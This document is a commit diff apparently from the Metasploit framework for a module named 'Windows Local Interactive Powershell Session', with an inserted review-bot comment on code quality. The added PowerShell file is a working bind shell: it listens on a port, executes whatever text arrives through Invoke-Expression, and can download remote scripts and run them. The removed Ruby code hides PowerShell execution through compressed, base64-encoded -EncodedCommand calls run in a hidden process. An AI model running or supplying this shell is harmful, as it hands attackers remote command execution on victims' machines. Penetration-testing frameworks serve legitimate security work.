Move script out of module
This commit is contained in:
parent
9fd3d3aa8c
commit
8bd0da580d
|
@ -0,0 +1,44 @@
|
|||
function Get-Webclient {
|
||||
$wc = New-Object Net.WebClient
|
||||
$wc.UseDefaultCredentials = $true
|
||||
$wc.Proxy.Credentials = $wc.Credentials
|
||||
$wc
|
||||
}
|
||||
|
||||
function powerfun($download) {
|
||||
$modules = @(MODULES_REPLACE)
|
||||
$listener = [System.Net.Sockets.TcpListener]LPORT_REPLACE
|
||||
$listener.start()
|
||||
[byte[]]$bytes = 0..255|%{0}
|
||||
$client = $listener.AcceptTcpClient()
|
||||
$stream = $client.GetStream()
|
||||
|
||||
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n 'Get-Help Module-Name -Full' for more details on any module.`n 'Get-Module -ListAvailable' for a list of loaded cmdlets.`n`n")
|
||||
$stream.Write($sendbytes,0,$sendbytes.Length)
|
||||
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
|
||||
$stream.Write($sendbytes,0,$sendbytes.Length)
|
||||
|
||||
if ($download -eq 1) { ForEach ($module in $modules)
|
||||
{
|
||||
(Get-Webclient).DownloadString($module)|Invoke-Expression
|
||||
}}
|
||||
|
||||
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
|
||||
{
|
||||
$EncodedText = New-Object System.Text.ASCIIEncoding
|
||||
$data = $EncodedText.GetString($bytes,0, $i)
|
||||
$sendback = (Invoke-Expression $data 2>&1 | Out-String )
|
||||
|
||||
$sendback2 = $sendback + "PS " + (get-location).Path + "> "
|
||||
$x = ($error[0] | out-string)
|
||||
$error.clear()
|
||||
$sendback2 = $sendback2 + $x
|
||||
|
||||
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
|
||||
$stream.Write($sendbyte,0,$sendbyte.Length)
|
||||
$stream.Flush()
|
||||
}
|
||||
$client.Close()
|
||||
$listener.Stop()
|
||||
}
|
||||
|
|
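Review bot: The tokens `MODULES_REPLACE` (in `$modules = @(MODULES_REPLACE)`) and `LPORT_REPLACE` (in the `TcpListener` line) are not valid PowerShell, and nothing in the new file says who substitutes them, so anyone who runs or lints the script on its own gets a parse error. Add a header comment such as `# Template: MODULES_REPLACE and LPORT_REPLACE are substituted by the Ruby module before the script is encoded; this file does not run as-is.` A second point worth a comment: the `while` loop hands each `$stream.Read` result straight to `Invoke-Expression`, and the buffer built by `0..255|%{0}` is only 256 bytes, so input longer than that is evaluated as several fragments rather than one command; `# NOTE: no line framing - each Read() chunk is executed on its own` would at least make that limitation visible. Minor: `$EncodedText = New-Object System.Text.ASCIIEncoding` is recreated on every iteration and could be hoisted above the loop.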
@ -9,6 +9,8 @@ require 'zlib'
|
|||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
|
||||
include Msf::Post::Windows::Powershell
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Windows Local Interactive Powershell Session",
|
||||
|
@ -24,14 +26,19 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'Dave Hardy', # changed module to load interactive powershell via bind tcp and load other powershell modules
|
||||
'Nicholas Nam (nick[at]executionflow.org)', # original meterpreter script
|
||||
'RageLtMan' # post module
|
||||
]
|
||||
],
|
||||
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows', { } ],
|
||||
],
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new( 'LOAD_MODULES', [false, 'A list of powershell modules seperated by a comma, for example set LOAD_MODULES http://www.powershell.com/power1.ps1,http://www.powershell.com/power2.ps1,', ""]),
|
||||
OptString.new( 'RHOST', [false, 'The IP of the system being exploited = rhost', ""]),
|
||||
OptString.new( 'LPORT', [false, 'The PORT of the PowerShell listener = lpost', "55555"])
|
||||
# OptString.new( 'RHOST', [false, 'The IP of the system being exploited = rhost', ""]),
|
||||
# OptString.new( 'LPORT', [false, 'The PORT of the PowerShell listener = lpost', "55555"])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
|
@ -55,64 +62,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print_status("Multi/handler started: payload=windows/shell_bind_tcp rhost=" + rhost + " lport=" + rport)
|
||||
end
|
||||
|
||||
#
|
||||
# Return a zlib compressed powershell script
|
||||
#
|
||||
def compress_script(script_in, eof = nil)
|
||||
|
||||
# Compress using the Deflate algorithm
|
||||
compressed_stream = ::Zlib::Deflate.deflate(script_in,
|
||||
::Zlib::BEST_COMPRESSION)
|
||||
|
||||
# Base64 encode the compressed file contents
|
||||
encoded_stream = Rex::Text.encode_base64(compressed_stream)
|
||||
|
||||
# Build the powershell expression
|
||||
# Decode base64 encoded command and create a stream object
|
||||
psh_expression = "$stream = New-Object IO.MemoryStream(,"
|
||||
psh_expression += "$([Convert]::FromBase64String('#{encoded_stream}')));"
|
||||
# Read & delete the first two bytes due to incompatibility with MS
|
||||
psh_expression += "$stream.ReadByte()|Out-Null;"
|
||||
psh_expression += "$stream.ReadByte()|Out-Null;"
|
||||
# Uncompress and invoke the expression (execute)
|
||||
psh_expression += "$(Invoke-Expression $(New-Object IO.StreamReader("
|
||||
psh_expression += "$(New-Object IO.Compression.DeflateStream("
|
||||
psh_expression += "$stream,"
|
||||
psh_expression += "[IO.Compression.CompressionMode]::Decompress)),"
|
||||
psh_expression += "[Text.Encoding]::ASCII)).ReadToEnd());"
|
||||
|
||||
# If eof is set, add a marker to signify end of script output
|
||||
if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
|
||||
|
||||
# Convert expression to unicode
|
||||
unicode_expression = Rex::Text.to_unicode(psh_expression)
|
||||
|
||||
# Base64 encode the unicode expression
|
||||
encoded_expression = Rex::Text.encode_base64(unicode_expression)
|
||||
|
||||
return encoded_expression
|
||||
end
|
||||
|
||||
#
|
||||
# Execute a powershell script and return the results. The script is never written
|
||||
# to disk.
|
||||
#
|
||||
def execute_script(script, time_out = 15)
|
||||
running_pids, open_channels = [], []
|
||||
# Execute using -EncodedCommand
|
||||
session.response_timeout = time_out
|
||||
cmd_out = session.sys.process.execute("powershell -EncodedCommand " +
|
||||
"#{script}", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
|
||||
# Add to list of running processes
|
||||
running_pids << cmd_out.pid
|
||||
|
||||
# Add to list of open channels
|
||||
open_channels << cmd_out
|
||||
|
||||
return [cmd_out, running_pids, open_channels]
|
||||
end
|
||||
|
||||
def exploit
|
||||
@client = client
|
||||
if (datastore['LOAD_MODULES'].empty?)
|
||||
|
@ -133,52 +82,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print("\n")
|
||||
end
|
||||
|
||||
script_in=""+
|
||||
"function Get-Webclient {\n"+
|
||||
" $wc = New-Object Net.WebClient\n"+
|
||||
" $wc.UseDefaultCredentials = $true\n"+
|
||||
" $wc.Proxy.Credentials = $wc.Credentials\n"+
|
||||
" $wc\n"+
|
||||
"}\n"+
|
||||
"\n"+
|
||||
"function powerfun($download) {\n"+
|
||||
"\n"+
|
||||
" $modules = @("+ modsall + ")\n"+
|
||||
" $listener = [System.Net.Sockets.TcpListener]"+datastore['LPORT']+"\n"+
|
||||
" $listener.start()\n"+
|
||||
" [byte[]]$bytes = 0..255|%{0}\n"+
|
||||
" $client = $listener.AcceptTcpClient()\n"+
|
||||
" $stream = $client.GetStream() \n"+
|
||||
"\n"+
|
||||
"$sendbytes = ([text.encoding]::ASCII).GetBytes(\"Windows PowerShell`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n 'Get-Help Module-Name -Full' for more details on any module.`n 'Get-Module -ListAvailable' for a list of loaded cmdlets.`n`n\")\n"+
|
||||
"$stream.Write($sendbytes,0,$sendbytes.Length)\n"+
|
||||
"$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')\n"+
|
||||
"$stream.Write($sendbytes,0,$sendbytes.Length)\n"+
|
||||
"\n"+
|
||||
" if ($download -eq 1) { ForEach ($module in $modules)\n"+
|
||||
" {\n"+
|
||||
" (Get-Webclient).DownloadString($module)|Invoke-Expression\n"+
|
||||
" }}\n"+
|
||||
"\n"+
|
||||
" while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)\n"+
|
||||
" {\n"+
|
||||
" $EncodedText = New-Object System.Text.ASCIIEncoding\n"+
|
||||
" $data = $EncodedText.GetString($bytes,0, $i)\n"+
|
||||
" $sendback = (Invoke-Expression $data 2>&1 | Out-String )\n"+
|
||||
"\n"+
|
||||
" $sendback2 = $sendback + \"PS \" + (get-location).Path + \"> \"\n"+
|
||||
" $x = ($error[0] | out-string)\n"+
|
||||
" $error.clear()\n"+
|
||||
" $sendback2 = $sendback2 + $x\n"+
|
||||
"\n"+
|
||||
" $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)\n"+
|
||||
" $stream.Write($sendbyte,0,$sendbyte.Length)\n"+
|
||||
" $stream.Flush() \n"+
|
||||
" }\n"+
|
||||
" $client.Close()\n"+
|
||||
" $listener.Stop()\n"+
|
||||
"}\n"+
|
||||
"\n"
|
||||
|
||||
if (datastore['LOAD_MODULES'].empty?)
|
||||
script_in = script_in + "powerfun \n"
|
||||
|
|